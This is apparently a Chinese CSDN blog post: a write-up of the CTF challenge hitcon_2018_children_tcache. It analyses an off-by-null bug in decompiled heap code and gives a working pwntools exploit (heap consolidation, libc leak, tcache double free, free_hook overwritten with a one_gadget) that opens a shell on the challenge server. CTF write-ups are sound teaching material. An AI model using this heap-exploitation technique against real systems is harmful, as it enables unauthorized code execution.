hitcon_2018_children_tcache

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量119 收藏 1
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132564393
版权

hitcon_2018_children_tcache

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

64位,保护全开

unsigned __int64 ADD()
{
  int i; // [rsp+Ch] [rbp-2034h]
  char *dest; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s[8216]; // [rsp+20h] [rbp-2020h] BYREF
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !qword_202060[i] )
      break;
  }
  printf("Size:");
  size = READ();
  if ( size > 0x2000 )
    exit(-2);
  dest = (char *)malloc(size);
  if ( !dest )
    exit(-1);
  printf("Data:");
  sub_BC8((__int64)s, size);
  strcpy(dest, s);
  qword_202060[i] = dest;
  qword_2020C0[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

add可以申请0x2000大小的chunk(一般我们也用不了那么大x

这里有个off by null

strcpy复制完之后,字符串末尾添加\x00,所以我们可以溢出一个\x00

int SHOW()
{
  __int64 v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = READ();
  if ( v2 > 9 )
    exit(-3);
  v0 = qword_202060[v2];
  if ( v0 )
    LODWORD(v0) = puts((const char *)qword_202060[v2]);
  return v0;
}

show这里就是打印指针指向的内容

int DELE()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = READ();
  if ( v1 > 9 )
    exit(-3);
  if ( qword_202060[v1] )
  {
    memset((void *)qword_202060[v1], 0xDA, qword_2020C0[v1]);
    free((void *)qword_202060[v1]);
    qword_202060[v1] = 0LL;
    qword_2020C0[v1] = 0LL;
  }
  return puts(":)");
}

dele 这里没有uaf,清空指针了

并且有个memset将chunk内的内容全部设置成0xda

本题是部署在libc-2.27

所以思路如下

,使用off by null 堆合并,然后使用tcache的doublefree控制fd,然后控制 malloc_hook或者free_hookonegadget

getshell

剩下补充在exp详情,(并且再详细也会配图x

from pwn import*
from Yapack import *
libc=ELF('./libc-2.27.so')   

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26633,"./pwn",0)

add(0x500,b'a')#0
add(0x68,b'a')#1
add(0x4f0,b'a')#2
add(0xf8,b'a')#3						#用来防止和top chunk合并
dele(0)									#堆合并
dele(1)
for i in range(9):						#这里是因为用off by null 
    add(0x68-i,b'a'*(0x68-i))			#把使用free时候,memset的0xDA的下一个chunk
    dele(0)								#prev_size清除掉,让我们放0x580
add(0x68,cyclic(0x60)+p64(0x580))		#改prev_size,并且把下一个chunk的inuse位清除掉
dele(2)
#到这里完成堆合并,但是chunk1的指针并没有free掉,所以我们申请掉上面的部分,
#unsortedbin切割掉,使其恰好指针指向chunk1,然后就能把main_arena泄露出来
#下面有图
add(0x508,'a'*0x507)					#0x507是防止off by null漏洞影响
show(0)
leak=get_addr_u64()-96-0x10-libc.sym['__malloc_hook']
li(leak)
sys=system(leak)
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
one=leak+0x4f322
free=freehook(leak)
#这里也可以用malloc_hook
add(0x68,b'a'*0x67)
dele(0)
dele(2)
add(0x60,p64(free))
add(0x60,b'a'*0x67)
add(0x60,p64(one))
li(one)
dele(0)
#debug()
ia()

补一下上面的图
在这里插入图片描述
然后getshell

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
heap_exploit_2.31
03-21
堆攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。 堆开发清单 在2.29和2.31之间进行堆利用技术,并收集有关相应利用技术的CTF挑战。... pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
HITCON_2018_children_tcache
SkYe's Blog
10-24 899
tcache 结合 off by null 基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled 基本堆管理器,有增删查功能。用 chunk_ptr_list 和 chunk_size_list 两个链表维护,数量上限为 12 ,使用的不是只递增的下标,而是哪个下标没有使用就用哪个,即只.
2018 HITCON On my Raddit
Risker
10-22 773
orange 大大出的这个题与其放在 Web 里,不如放在 Crypto 里。这里说一下比赛时的思路。 打开题目: flag 是加密密钥,而 hint 提示加密密钥是小写字母。还有一个P的提示。 查看一波源码: 可以看到都是?s=密文的形式。网页提供了一个页面显示多少文章的选项,我们关注一下这块的源码: 可以看到两个密文前 64bit是一样的,后 64bit 不同,可以推断 64 bit 应...
HITCON_2018_Hackergame_2018_calc(一个容易忽略的计算机整数小知识)
seaaseesa的博客
07-24 440
HITCON_2018_Hackergame_2018_calc 用IDA分析一下,程序注册了异常信号处理函数。 该函数可以执行命令 现在,只要想办法触发异常即可。 程序中过滤了除0异常,其实还可以利用-0x80000000/-1来触发异常。 我们可以做个试验 #include <stdio.h> int main() { int a,b; scanf("%d%d",&a,&b); int c = a/b; pri...
HITCON 2018 BabyCake WriteUp && XDebug + VSCode远程调试
heySister
11-22 1056
哦,终于把这道题目搞定了,写一下我的复现过程,主要是配了一下Xdebug的环境,因为手抖耽误了很多时间。 先贴一下docker: docker pull gaoxijiejie/babycake 下载好之后运行指令为: docker run -id --name cake-xdebug -p 8080:80 -p 9009:9009 cake-xdebug /bin/bash (xdebug使用的...
hitcon_2018_children_tcache(UNsortattack,chunk extend,house of orange,srop)
weixin_61283545的博客
09-02 169
复现了一下师傅的exp这个题目的关键在于strcpy会溢出\x00我们就要利用它来清空chunk2的prev位达到chunk extend的效果,值得注意的是这道题free的时候指针是被清空了的注意每次malloc后的id,比如在循环阶段abac型构造的堆段,我们free a,b之后作为unsortbin的a和铺垫的bin的b被free后,我们id 0,1的chunk也就消失了,所以我们循环清空prev时申请回来的id是0,相同的原理我们最后才能构造一个double c同时指向一个堆段。
hitcon_2018_children_tcache(tcache off-by-null,另一种doublefree)
m0_51251108的博客
11-06 413
hitcon_2018_children_tcache: 显然保护全开 逆向分析: add函数: 漏洞在这个strcpy函数上 delete函数: show函数:
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 251
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 545
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 187
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 420
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 317
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 742
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值